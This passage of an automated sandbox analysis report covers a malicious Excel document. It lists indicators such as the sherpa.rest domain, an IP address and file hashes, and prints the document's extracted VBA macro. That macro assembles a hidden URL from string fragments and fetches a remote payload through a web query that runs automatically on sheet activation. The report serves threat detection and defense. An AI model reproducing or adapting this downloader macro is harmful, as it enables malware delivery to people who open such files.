                                                                                                                                                        172.67.221.76 | d11311145.xls | Get hash | malicious | Browse |

                                                                                                                                                          Domains

                                                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                          sherpa.rest | d11311145.xls | Get hash | malicious | Browse | 104.27.173.15
                                                                                                                                                          sherpa.rest | d11311145.xls | Get hash | malicious | Browse | 104.27.173.15

                                                                                                                                                          ASN

                                                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                          ACHWlRE REMlTTANCE ADVlCE..xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://www.canva.com/design/DAEN4Gk1aAs/uErgK6sn3gPozGMXWtYgqA/view?utm_content=DAEN4Gk1aAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          win_encryptor.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH WlRE REMlTTANCE PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://www.google.com/url?q=https://sedgefuneralplan.com/pinafore.php&sa=D&ust=1605725146740000&usg=AOvVaw1JCRUh1siinDauICG91nF3Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://bxjg2oj292.zizera.com/F00929377Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH & WlRE REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):626709
                                                                                                                                                          Entropy (8bit):0.5031071884738996
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5IJC48SFq/fZ0jGB5bQYLWtwtZ1IV+hVZO4FAvWGTHi5hF:6C4HEZLUht/2iTH+X
                                                                                                                                                          MD5:F76279857E6EEF0A400CDC66D4481273
                                                                                                                                                          SHA1:904A4D8EE1639003E636BD434F066B33308654AF
                                                                                                                                                          SHA-256:FE4F12EB6414CAC4845EF34C6FBF5A3FFC6C1ADD51C56E2FB5D058F90361A03B
                                                                                                                                                          SHA-512:E66A8B40BEB1DDDB11A28D832B66096C9817486003D6F29FABC9391FEFB5B9BA313FF36243DA28A8D23CE1476466B96E3F391964617ED2CB7C73233867A2E471
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36
                                                                                                                                                          Entropy (8bit):2.730660070105504
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                          MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                          SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                          SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                          SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):1.4172860556164644
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:B//FFaV:p/Hu
                                                                                                                                                          MD5:E698F24BC9310DEFAFA33DC18788A7FD
                                                                                                                                                          SHA1:68B43654690AA4ABF0E5EE8D878240FF9FA8F588
                                                                                                                                                          SHA-256:488C20172E44B59D6D2A3B25E5059E4EDEF39282A7960E325CA99D0596B4524E
                                                                                                                                                          SHA-512:5A7D53C9592E8B78B8C7E06D71C84FFFCE0A8279D0E6C4BF9E50ACA8D66410FAA176A788EF675D71B13AA3BEF871E9293D501A01FE302CD3AF522129BF4EB789
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: 216041. Admin.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\617A6017-3014-4CF5-A8EA-F75B714BAAF0
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):129952
                                                                                                                                                          Entropy (8bit):5.378350056332974
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:+cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:cmQ9DQW+zBX8u
                                                                                                                                                          MD5:128DBF8C46E8139662B35A0CC4157738
                                                                                                                                                          SHA1:FE6D65207AC0671A57A6EE362D89BBDC7EECF2CB
                                                                                                                                                          SHA-256:776598D04D9B6E6F0E19C0C2D63E73475D1EDB99239FA1AFA884C4CB8897A0DD
                                                                                                                                                          SHA-512:4326161E7CB3D3407EBE2E1B9BFDA8FF5B2C326B29FED16B20772F585DBB759108B1CB8EE3962F4068EBE085B1718CEF4A5BC65DE10C4CF36CACC18D286C9A58
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T07:55:16">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ED120000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):47395
                                                                                                                                                          Entropy (8bit):7.751135057057903
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:8VuhzHYkZ6Z0xeyLkcTcNvL0h4utZss/aEf/WBQ/e4py+vz:8VuhEkZ6tcTcNvIh4utZsSaO/WCWh+vz
                                                                                                                                                          MD5:A6236930282FAC3FC1646B9C0AB4B3D1
                                                                                                                                                          SHA1:E22EA64D9D73EADC161443708813185836D0CC6B
                                                                                                                                                          SHA-256:BEBB34F7015B6B46347DC152FBE96B03A4BCF38D36598545D9CBD07CAF3ADFD6
                                                                                                                                                          SHA-512:04AC96CB4A9C250B095E292915F2B364BC27057D7D2FA0B815EF4C407CB9144A627536976F8A44C1AD7900F629B6BB7FC3C8BB6A72D7BAE8ABBB0639F66063D9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):170164
                                                                                                                                                          Entropy (8bit):4.363228647751794
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:fLMKLfolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fVc8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                          MD5:585D4D9F489465C7910F738F54015231
                                                                                                                                                          SHA1:8D7DDBDD54965DB24B8DB697D2847402AAA38401
                                                                                                                                                          SHA-256:01D994455C78DACD432531EED4FF112C0E860C5B7B1A70774C9D2059065BAA14
                                                                                                                                                          SHA-512:7304543BBFCDC591C77BFE8F91852B5E324049067233FFCA0112691EE1D50B52D3B0210F85A907CF670EA5FE984F4700978DFE3CAE1E090E9C35C6355287D76F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 19:05:17 2019, mtime=Thu Nov 19 15:55:42 2020, atime=Thu Nov 19 15:55:42 2020, length=8192, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):920
                                                                                                                                                          Entropy (8bit):4.682108861205002
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:8ECDU9peCHqDGqgkXe/6AEeM8+WMEjAt/rbD7b1e0b1eZ44t2Y+xIBjKZm:8EOVglLNMxQAtvDuw7aB6m
                                                                                                                                                          MD5:0616211745B3EB0F248AE7A299558A42
                                                                                                                                                          SHA1:E9496DE0593D39EEFC0C21B76F15493F6B78C5D7
                                                                                                                                                          SHA-256:E789AF734829983C00D4210911915144074ABB97CCD20B54F202B63D8663ACA2
                                                                                                                                                          SHA-512:AA61E1470D056BDB2A04AA90EACBE224D5AC843E0BE30C08D0DAE992F7CE8F0E95B0723FB7C3D145BCC654528583627BB1E5029E8033C685613367F91EEB50F3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):26
                                                                                                                                                          Entropy (8bit):4.315824333525707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:bDesBVov:bSsjy
                                                                                                                                                          MD5:1063941D0DFB4EEF54E229F8824BBF78
                                                                                                                                                          SHA1:F5D426DD401DEF6D899B39A724A2CBD49B5E723C
                                                                                                                                                          SHA-256:1F5532486F511ECE84285BB578119EF28A15A44E4E63DC63C92F2EAEA5D7A25D
                                                                                                                                                          SHA-512:82DAA6F61F7FB49FA88660101915700B66F2B4E285559B8381902239922D83FFAD76C970D25FCEEC4C2E716733453789575B76A52E5C75CDF4A277F71770B696
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: [folders]..Desktop.LNK=0..
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22
                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 18 06:47:39 2020, Security: 0
                                                                                                                                                          Entropy (8bit):4.360697246981449
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                          File name:doc2227740.xls
                                                                                                                                                          File size:88576
                                                                                                                                                          MD5:b43d8b40f9ef15965d0ff901e30c2f32
                                                                                                                                                          SHA1:3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572
                                                                                                                                                          SHA256:196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda
                                                                                                                                                          SHA512:57e42961b4ffe2b4233e05e8619a4dd59a9f00a7c68bf4cc57843cb6f3803c51c727287d9407c4787b5fb8be2caff1105e30abd4c82c9ccc3b335ff9e754c72e
                                                                                                                                                          SSDEEP:1536:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAUA4duNxABg/geJtJSuAO1arCFsi:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QD

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "doc2227740.xls"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                          Summary

                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:
                                                                                                                                                          Keywords:
                                                                                                                                                          Last Saved By:
                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                          Last Saved Time:2020-11-18 06:47:39
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0

                                                                                                                                                          Document Summary

                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Category:PmFbdwr0TuP
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Manager:
                                                                                                                                                          Company:
                                                                                                                                                          Contains Dirty Links:False
                                                                                                                                                          Shared Document:False
                                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                                          Application Version:983040

                                                                                                                                                          Streams with VBA

                                                                                                                                                          VBA File Name: Sheet1.cls, Stream Size: 5844
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                          VBA File Name:Sheet1.cls
                                                                                                                                                          Stream Size:5844

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          BackgroundQuery:=False
                                                                                                                                                          TEXTJOIN(Delimiter
                                                                                                                                                          .AdjustColumnWidth
                                                                                                                                                          True,
                                                                                                                                                          (Len(x)
                                                                                                                                                          seconds)
                                                                                                                                                          .WebConsecutiveDelimitersAsOne
                                                                                                                                                          Public
                                                                                                                                                          .WebFormatting
                                                                                                                                                          Resume
                                                                                                                                                          Mid(TEXTJOIN,
                                                                                                                                                          "Range"
                                                                                                                                                          ActiveSheet.QueryTables.Add(Connection:=
                                                                                                                                                          While
                                                                                                                                                          .WorkbookConnection.Delete
                                                                                                                                                          False
                                                                                                                                                          Wait(seconds
                                                                                                                                                          "htt"
                                                                                                                                                          www.TheSpreadsheetGuru.com
                                                                                                                                                          xlInsertDeleteCells
                                                                                                                                                          MakeWebQuery
                                                                                                                                                          String,
                                                                                                                                                          Cell.Value
                                                                                                                                                          Excel
                                                                                                                                                          "lol"
                                                                                                                                                          String
                                                                                                                                                          MakeWebQuery()
                                                                                                                                                          Len(RangeArea)
                                                                                                                                                          Len(Cell.Value)
                                                                                                                                                          .Refresh
                                                                                                                                                          Destination:=
                                                                                                                                                          .WebSelectionType
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          shFirstQtr
                                                                                                                                                          Range
                                                                                                                                                          .FillAdjacentFormulas
                                                                                                                                                          "ps:"
                                                                                                                                                          .PreserveFormatting
                                                                                                                                                          .BackgroundQuery
                                                                                                                                                          "info.p"
                                                                                                                                                          .WebDisableDateRecognition
                                                                                                                                                          Through
                                                                                                                                                          RangeArea
                                                                                                                                                          VB_Base
                                                                                                                                                          Boolean,
                                                                                                                                                          .WebSingleBlockTextImport
                                                                                                                                                          .PostText
                                                                                                                                                          Given
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Input
                                                                                                                                                          Entered
                                                                                                                                                          Integer)
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          Empty
                                                                                                                                                          (Timer
                                                                                                                                                          Ignore_Empty
                                                                                                                                                          .WebPreFormattedTextToColumns
                                                                                                                                                          ParamArray
                                                                                                                                                          .SavePassword
                                                                                                                                                          'SOURCE:
                                                                                                                                                          "info"
                                                                                                                                                          Worksheet_Activate()
                                                                                                                                                          Error
                                                                                                                                                          .WebDisableRedirections
                                                                                                                                                          Attribute
                                                                                                                                                          'PURPOSE:
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          Timer()
                                                                                                                                                          VB_Name
                                                                                                                                                          Private
                                                                                                                                                          TypeName(RangeArea)
                                                                                                                                                          CONCAT
                                                                                                                                                          "//sherpa"
                                                                                                                                                          Function
                                                                                                                                                          Variant
                                                                                                                                                          xlWebFormattingNone
                                                                                                                                                          Len(Delimiter)
                                                                                                                                                          VB_Customizable
                                                                                                                                                          ".rest/wp-"
                                                                                                                                                          "pic"
                                                                                                                                                          DoEvents
                                                                                                                                                          '.RefreshStyle
                                                                                                                                                          xlEntirePage
                                                                                                                                                          swedr
                                                                                                                                                          'Text
                                                                                                                                                          "URL;"
                                                                                                                                                          Delimiter
                                                                                                                                                          .RefreshOnFileOpen
                                                                                                                                                          .RowNumbers
                                                                                                                                                          'Loop
                                                                                                                                                          Variant)
                                                                                                                                                          Replicates
                                                                                                                                                          Worksheet_Calculate()
                                                                                                                                                          TEXTJOIN
                                                                                                                                                          .RefreshPeriod
                                                                                                                                                          TEXTJOIN("",
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet1"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                            Sub Wait(seconds As Integer)
                                                                                                                                                                Dim now As Long
                                                                                                                                                                now = Timer()
                                                                                                                                                                Do
                                                                                                                                                                    DoEvents
                                                                                                                                                                Loop While (Timer < now + seconds)
                                                                                                                                                              End Sub
                                                                                                                                                              
                                                                                                                                                          Public Function TEXTJOIN(Delimiter As String, Ignore_Empty As Boolean, ParamArray Text1() As Variant) As String
                                                                                                                                                          'PURPOSE: Replicates The Excel 2016 Function CONCAT
                                                                                                                                                          'SOURCE: www.TheSpreadsheetGuru.com
                                                                                                                                                          
                                                                                                                                                          Dim RangeArea As Variant
                                                                                                                                                          Dim Cell As Range
                                                                                                                                                          
                                                                                                                                                          'Loop Through Each Cell in Given Input
                                                                                                                                                            For Each RangeArea In Text1
                                                                                                                                                              If TypeName(RangeArea) = "Range" Then
                                                                                                                                                                For Each Cell In RangeArea
                                                                                                                                                                  If Len(Cell.Value) <> 0 Or Ignore_Empty = False Then
                                                                                                                                                                    TEXTJOIN = TEXTJOIN & Delimiter & Cell.Value
                                                                                                                                                                  End If
                                                                                                                                                                Next Cell
                                                                                                                                                              Else
                                                                                                                                                                'Text String was Entered
                                                                                                                                                                  If Len(RangeArea) <> 0 Or Ignore_Empty = False Then
                                                                                                                                                                    TEXTJOIN = TEXTJOIN & Delimiter & RangeArea
                                                                                                                                                                  End If
                                                                                                                                                              End If
                                                                                                                                                            Next RangeArea
                                                                                                                                                          
                                                                                                                                                          TEXTJOIN = Mid(TEXTJOIN, Len(Delimiter) + 1)
                                                                                                                                                          
                                                                                                                                                          End Function
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Sub MakeWebQuery()
                                                                                                                                                          ll = "htt"
                                                                                                                                                          Set shFirstQtr = Workbooks(1).Worksheets(1)
                                                                                                                                                           ll = ll & "ps:"
                                                                                                                                                          Set shFirstQtr2 = Workbooks(1).Worksheets(1)
                                                                                                                                                           swedr = "pic"
                                                                                                                                                           ll = ll & "//sherpa"
                                                                                                                                                          Set shFirstQtr3 = Workbooks(1).Worksheets(1)
                                                                                                                                                           kol = "   kol"
                                                                                                                                                           ll = ll & ".rest/wp-" & Empty & Empty & "" & "info.p"
                                                                                                                                                           der5 = "lol"
                                                                                                                                                           Set shFirstQtr4 = Workbooks(1).Worksheets(1)
                                                                                                                                                           ll = ll & "hp"
                                                                                                                                                           
                                                                                                                                                          On Error Resume Next
                                                                                                                                                           ThisWorkbook.Sheets(2).Activate
                                                                                                                                                              With ActiveSheet.QueryTables.Add(Connection:=         "URL;" & ll, Destination:=         Range("D50"))
                                                                                                                                                                   .PostText = ""
                                                                                                                                                              .RowNumbers = False
                                                                                                                                                              .FillAdjacentFormulas = False
                                                                                                                                                              .PreserveFormatting = True
                                                                                                                                                              .RefreshOnFileOpen = False
                                                                                                                                                              .BackgroundQuery = False
                                                                                                                                                              '.RefreshStyle = xlInsertDeleteCells
                                                                                                                                                              .SavePassword = False
                                                                                                                                                              .AdjustColumnWidth = False
                                                                                                                                                              .RefreshPeriod = 0
                                                                                                                                                              .WebSelectionType = xlEntirePage
                                                                                                                                                              .WebFormatting = xlWebFormattingNone
                                                                                                                                                              .WebPreFormattedTextToColumns = True
                                                                                                                                                              .WebConsecutiveDelimitersAsOne = False
                                                                                                                                                              .WebSingleBlockTextImport = True
                                                                                                                                                              .WebDisableDateRecognition = False
                                                                                                                                                              .WebDisableRedirections = False
                                                                                                                                                              .Refresh BackgroundQuery:=False
                                                                                                                                                              .WorkbookConnection.Delete
                                                                                                                                                              End With
                                                                                                                                                              Wait 2
                                                                                                                                                              x = TEXTJOIN("", True, Range("D50:IV666"))
                                                                                                                                                              If (Len(x) > 30000) Then
                                                                                                                                                              UserForm1.TextBox1.Value = x
                                                                                                                                                              End If
                                                                                                                                                          End Sub
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Private Sub Worksheet_Activate()
                                                                                                                                                          If UserForm1.Label1.Caption <> "info" Then
                                                                                                                                                          UserForm1.Label1.Caption = "info"
                                                                                                                                                           MakeWebQuery
                                                                                                                                                          End If
                                                                                                                                                          End Sub
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          Private Sub Worksheet_Calculate()
                                                                                                                                                          If UserForm1.Label1.Caption <> "info" Then
                                                                                                                                                          UserForm1.Label1.Caption = "info"
                                                                                                                                                           MakeWebQuery
                                                                                                                                                          End If
                                                                                                                                                          End Sub
                                                                                                                                                          VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                          VBA File Name:Sheet2.cls
                                                                                                                                                          Stream Size:977

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet2"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                          VBA File Name:Sheet3.cls
                                                                                                                                                          Stream Size:977

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet3"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet4.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet4
                                                                                                                                                          VBA File Name:Sheet4.cls
                                                                                                                                                          Stream Size:977

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet4"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: Sheet5.cls, Stream Size: 977
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet5
                                                                                                                                                          VBA File Name:Sheet5.cls
                                                                                                                                                          Stream Size:977

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "Sheet5"
                                                                                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                          VBA File Name:ThisWorkbook.cls
